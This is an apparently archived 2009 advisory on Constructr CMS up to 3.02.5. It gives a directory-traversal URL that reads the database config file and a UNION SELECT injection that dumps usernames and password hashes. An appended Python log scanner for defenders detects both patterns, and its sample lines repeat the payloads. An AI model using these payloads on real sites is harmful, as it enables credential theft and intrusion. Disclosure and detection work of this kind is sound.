Constructr CMS <= 3.02.5 Stable Multiple Remote Vulnerabilities

2009-01-06 / 2009-01-07
Credit: nukeit
Risk: Low
Local: No
Remote: Yes
CWE: CWE-255

Constructr CMS
http://constructr-cms.org/
-
<= 3.02.5 "Stable"
-
magic_quotes_gpc = Off
register_globals = On
-
Directory Traversal
-
Source Disclosure
-
Arbitrary File Creation
-
Etc Etc Etc
-
http://site/constructr/backend/template.php?edit_file=
Db info: ../config/config.inc.php
-
SQL
-
http://site/constructr/?show_page=
User (urlencode) : -0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
"Hash" is the password, not really encrypted...
-
Timeline
-
Author notified: Dec 12
Public Disclosure: Dec 19
-
Seasons Greetings
-
-
http://nukeit.org
-

References:

http://www.milw0rm.com/exploits/7529
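
A log check for the two request patterns named in the advisory, added here as an example (it is not code from the advisory or from Constructr). It assumes Apache-style combined access logs; the sample lines are constructed, and the finding labels and function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (documentation IP range, invented timestamps).
SAMPLE_LOG = """\
198.51.100.7 - - [19/Dec/2008:10:01:02 +0100] "GET /constructr/?show_page=3 HTTP/1.1" 200 5120
198.51.100.7 - - [19/Dec/2008:10:01:09 +0100] "GET /constructr/backend/template.php?edit_file=..%2Fconfig%2Fconfig.inc.php HTTP/1.1" 200 913
198.51.100.7 - - [19/Dec/2008:10:01:15 +0100] "GET /constructr/?show_page=-0%27%20UNION%20ALL%20SELECT%20NULL HTTP/1.1" 200 4411
198.51.100.7 - - [19/Dec/2008:10:01:20 +0100] "GET /constructr/backend/template.php?edit_file=%252e%252e%252fconfig%252fconfig.inc.php HTTP/1.1" 404 210
"""

LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+" (\d{3})')
SQL_TOKENS = re.compile(r"'|\bunion\b|\bselect\b", re.I)

def classify(request_target):
    """Return finding labels for one request target (path plus query)."""
    parts = urlsplit(request_target)
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    # Advisory endpoint 1: backend/template.php?edit_file=
    if parts.path.endswith("/backend/template.php"):
        for value in params.get("edit_file", []):
            # parse_qs decoded once; decode again to catch double encoding.
            decoded = unquote(value).replace("\\", "/")
            if ".." in decoded.split("/") or decoded.startswith("/"):
                findings.append("edit_file-traversal")
    # Advisory endpoint 2: ?show_page= (quote or UNION/SELECT in the value)
    for value in params.get("show_page", []):
        if SQL_TOKENS.search(unquote(value)):
            findings.append("show_page-sqli")
    return findings

def scan(log_text):
    """Return (line number, finding, HTTP status) for each suspicious line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        for finding in classify(match.group(1)):
            hits.append((number, finding, int(match.group(2))))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 status next to an `edit_file-traversal` hit is the case to triage first, since the advisory states the configuration file with the database details is reachable that way.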

